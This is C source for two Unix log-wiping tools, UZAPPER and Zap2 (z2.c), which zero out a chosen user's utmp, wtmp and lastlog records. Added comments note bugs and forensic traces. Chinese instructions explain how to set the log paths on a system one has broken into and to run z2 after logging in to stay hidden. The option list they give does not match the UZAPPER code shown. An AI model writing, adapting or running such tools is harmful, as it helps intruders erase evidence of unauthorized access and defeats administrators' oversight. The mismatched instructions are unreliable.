/*=============================================================================

UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD

The Shadow Penguin Security ( http://shadowpenguin.backsection.net )

Written by UNYUN ( unewn4th@usa.net )

=============================================================================

*/

 

#include <stdio.h>

#include <fcntl.h>

#include <unistd.h>

#include <utmp.h>

 

#ifdef UTMAXTYPE

#define UTMPX

#include <utmpx.h>

#endif

#include <pwd.h>

#ifndef _PATH_LASTLOG

#include <lastlog.h>

#endif

#include <sys/types.h>

#include <sys/stat.h>

#include <sys/utsname.h>

 

#define SVR4_UTMP "/var/adm/utmp"

#define SVR4_WTMP "/var/adm/wtmp"

#define SVR4_LASTLOG "/var/adm/lastlog"

 

#define SUNOS4_UTMP "/etc/utmp"

#define SUNOS4_WTMP "/usr/adm/wtmp"

#define SUNOS4_LASTLOG "/usr/adm/lastlog"

 

#define BSD_UTMP "/var/run/utmp"

#define BSD_WTMP "/var/log/wtmp"

#define BSD_LASTLOG "/var/log/lastlog"

 

#define MAX_FPATH 512

 

/*
 * wipe_log: scan a utmp-format (type==0) or utmpx-format (type!=0) file
 * record by record and zero-fill, in place, every record whose user-name
 * field starts with `user`.
 *
 * path  - accounting file to rewrite; an empty string is skipped (returns 1).
 * user  - name to match; compared with strncmp over strlen(user), so any
 *         user name that merely has `user` as a prefix also matches.
 * type  - 0 selects struct utmp; anything else selects struct utmpx
 *         (the utmpx branch only exists when UTMPX is defined).
 * Returns 1 for an empty path, -1 when open() fails (a descriptor of 0 is
 * also treated as failure), 0 otherwise.
 *
 * Forensic footprint: matching records are overwritten with zero bytes,
 * not removed. The file keeps its length, and the zeroed slots remain as
 * all-NUL records that a utmp/wtmp consistency check can flag.
 */
int wipe_log(path,user,type)

char *path,*user;

int type;

{

struct utmp utmp_ent;

#ifdef UTMPX

struct utmpx utmpx_ent;

#endif

void *ent;   /* points at whichever record buffer is in use */

char *un;    /* points at the user-name field inside *ent, so it reflects each record as it is read */

int sz,fd,c=0;   /* sz: record size in bytes; c: number of records zeroed */

 

if (strlen(path)==0) return(1);

if (type==0){

ent=(void *)&utmp_ent;

#ifdef UTMPX

un=(char *)&utmp_ent.ut_user;

#else

un=(char *)&utmp_ent.ut_name;

#endif

sz=sizeof(struct utmp);

}else{

#ifdef UTMPX

ent=(void *)&utmpx_ent;

un=(char *)&utmpx_ent.ut_user;

sz=sizeof(struct utmpx);

#endif

/* when UTMPX is not defined this branch assigns nothing: ent, un and sz stay uninitialized */

}

if ((fd=open(path,O_RDWR))<=0) return(-1);

/* read one record at a time; on a prefix match, zero the buffer, seek back
 * one record and overwrite it. lseek() and write() results are not checked. */
while(read(fd,ent,sz)>0)

if (!strncmp(un,user,strlen(user))){

memset(ent,0,sz);

lseek(fd,-sz,SEEK_CUR);

write(fd,ent,sz);

c++;

}

close(fd);

printf("Wiped %d entries of %s from %s.\n",c,user,path);

return(0);

}

 

/*
 * wipe_lastlog: overwrite the lastlog record of `user` with zeros.
 *
 * path  - type==0: a single lastlog file indexed by uid; the record at
 *         offset pw_uid * sizeof(struct lastlog) is zeroed.
 *         type!=0: a directory of per-user files; "<path>/<user>" is opened
 *         and one zero record is written at offset 0 (no seek).
 * user  - account name, resolved with getpwnam().
 * Returns -1 if the user is unknown, -2 if open() fails (descriptor 0 is
 * also treated as failure), 0 otherwise.
 *
 * The path is assembled with strcpy/sprintf into a MAX_FPATH buffer with
 * no length check; in this program `user` comes straight from argv.
 * Forensic footprint: the slot is zero-filled in place, so an all-zero
 * lastlog entry for an account that otherwise exists is the artifact.
 */
int wipe_lastlog(path,user,type)

char *path,*user;

int type;

{

struct passwd *p;

struct lastlog ent;   /* zeroed below and written over the target slot */

int fd;

char buffer[MAX_FPATH];   /* filled by unbounded strcpy/sprintf below */

 

if (type==0) strcpy(buffer,path);

else sprintf(buffer,"%s/%s",path,user);

memset(&ent,0,sizeof(struct lastlog));

if ((p=getpwnam(user))==NULL) return(-1);

if ((fd=open(buffer,O_RDWR))<=0) return(-2);

/* uid-indexed file: position on this user's slot; per-user file: stay at offset 0 */
if (type==0)

lseek(fd,p->pw_uid*sizeof(struct lastlog),SEEK_SET);

write(fd,&ent,sizeof(struct lastlog));   /* result not checked */

close(fd);

printf("Wiped %s from %s.\n",user,path);

return(0);

}

 

/*
 * Entry point: `<program> <username>`.
 * Checks the argument count and that the user exists, then chooses the
 * accounting file paths from uname().sysname and calls wipe_log() for
 * utmp/utmpx/wtmp/wtmpx and wipe_lastlog() for lastlog.
 *
 *  - f_utmpx and f_wtmpx are set to "" first, so wipe_log() skips them
 *    (it returns 1 for an empty path) on systems where no utmpx path is set.
 *  - lastlog_type is assigned only in the SunOS and IRIX branches; f_utmp,
 *    f_wtmp and f_lastlog are assigned only in the recognised branches.
 *  - The "System Unknown" messages do not stop execution: the wipe_* calls
 *    below still run afterwards.
 *  - main() has no declared return type and no return statement (K&R style).
 */
main(argc,argv)

int argc;

char *argv[];

{

char f_utmp[MAX_FPATH],f_utmpx[MAX_FPATH];

char f_wtmp[MAX_FPATH],f_wtmpx[MAX_FPATH];

char f_lastlog[MAX_FPATH];

struct utsname utname;

int lastlog_type;   /* 0: uid-indexed lastlog file; 1: per-user lastlog directory */

 

if (argc!=2){

printf("Usage: %s Usernane\n",argv[0]);

exit(1);

}

if (getpwnam(argv[1])==NULL){

printf("Unknown user : %s\n",argv[1]);

exit(1);

}

uname(&utname);   /* result not checked */

strcpy(f_wtmpx,""); strcpy(f_utmpx,"");   /* cleared so wipe_log() skips them when no utmpx path is chosen */

if (!strcmp(utname.sysname,"SunOS")){

#ifdef UTMPX

strcpy(f_utmp, SVR4_UTMP);

strcpy(f_wtmp, SVR4_WTMP);

strcpy(f_utmpx, UTMPX_FILE);

strcpy(f_wtmpx, WTMPX_FILE);

strcpy(f_lastlog, SVR4_LASTLOG);

lastlog_type=0;

#else

strcpy(f_utmp, SUNOS4_UTMP);

strcpy(f_wtmp, SUNOS4_WTMP);

strcpy(f_lastlog, SUNOS4_LASTLOG);

lastlog_type=0;

#endif

}else if (!strcmp(utname.sysname,"Linux")

|| !strcmp(utname.sysname,"FreeBSD")){

/* lastlog_type is not assigned in this branch */
strcpy(f_utmp, BSD_UTMP);

strcpy(f_wtmp, BSD_WTMP);

strcpy(f_lastlog, BSD_LASTLOG);

}else if (!strcmp(utname.sysname,"IRIX")){

#ifdef UTMPX

strcpy(f_utmp, SVR4_UTMP);

strcpy(f_wtmp, SVR4_WTMP);

strcpy(f_utmpx, UTMPX_FILE);

strcpy(f_wtmpx, WTMPX_FILE);

strcpy(f_lastlog, SVR4_LASTLOG);

lastlog_type=1;

#else

printf("Can not wipe. System Unknown.\n");

#endif

}else

/* no exit here: execution falls through to the wipe_* calls below */
printf("Can not wipe. System Unknown.\n");

 

wipe_log(f_utmp, argv[1],0);

wipe_log(f_utmpx,argv[1],1);

wipe_log(f_wtmp, argv[1],0);

wipe_log(f_wtmpx,argv[1],1);

wipe_lastlog(f_lastlog,argv[1],lastlog_type);

}
编译好的wipe
其中 u 选项为 utmp utmpx 日志擦除..
w 选项为 wtmp wtmpx 日志擦除.
l 选项为 lastlog 日志擦除.
a 为/var/adm/pacct日志擦除

Zap2 (清除 wtmp/lastlog/utmp记录)
我们先来完成z2这个程序。你必须了解每个文件在你入侵的系统中的位置以便修改z2.c,使其包含这些文件的正确路径。
下面是在文件头部的需要你修改的部分。
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
在有些系统中应该是:
#define WTMP_NAME "/var/adm/wtmp"
#define UTMP_NAME "/var/adm/utmp"
#define LASTLOG_NAME "/var/adm/lastlog"

但你应该自己查看一下这些文件存放在你要入侵的系统的什么位置。/var/log目录也是很可能的一个路径。修改好正确的文件路径后,编译这个文件,现在你登录之后运行z2,你就已比较安全了。
这里是c程序:
z2.c
--------------------------- cut here
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;   /* file descriptor shared by all kill_* routines below (single global) */

/*
 * kill_utmp: forward scan of UTMP_NAME; every record whose ut_name starts
 * with `who` (strncmp over strlen(who), so prefixes also match) is
 * zero-filled in place: seek back one record, rewrite. Silently does
 * nothing if the file cannot be opened; lseek/write results are unchecked.
 * The zeroed records stay in the file as all-NUL slots of unchanged size.
 */
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

/*
 * kill_wtmp: walk WTMP_NAME backwards from the end, one struct utmp per
 * step (pos counts records back from EOF; L_XTND is the BSD name for
 * SEEK_END). The first match found, i.e. the most recent record for
 * `who`, is zero-filled in place and the loop stops (pos = -1L); older
 * records for the same user are left intact, which is itself a detectable
 * inconsistency. Only a negative read() result ends a scan that found
 * nothing; a read() of 0 bytes does not, so termination when nothing
 * matches is not guaranteed by this loop alone.
 */
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;   /* number of records back from end of file */

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;   /* stop after the most recent match */
} else pos += 1L;
}
}
close(f);
}
}

/*
 * kill_lastlog: zero the lastlog slot of `who`. The slot sits at
 * pw_uid * sizeof(struct lastlog) from the start of LASTLOG_NAME (the
 * third lseek() argument, 0, is SEEK_SET). Prints "<who>: ?" when the
 * user is unknown; silently skips when the file cannot be opened.
 * The result is an all-zero record for an existing uid.
 */
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;   /* zeroed and written over the slot */

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

/*
 * Entry point: `z2 <username>` runs the three kill_* routines in the order
 * lastlog, wtmp, utmp and prints "Zap2!"; any other argument count prints
 * "Error.". Return type and return value are left implicit (K&R style).
 */
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}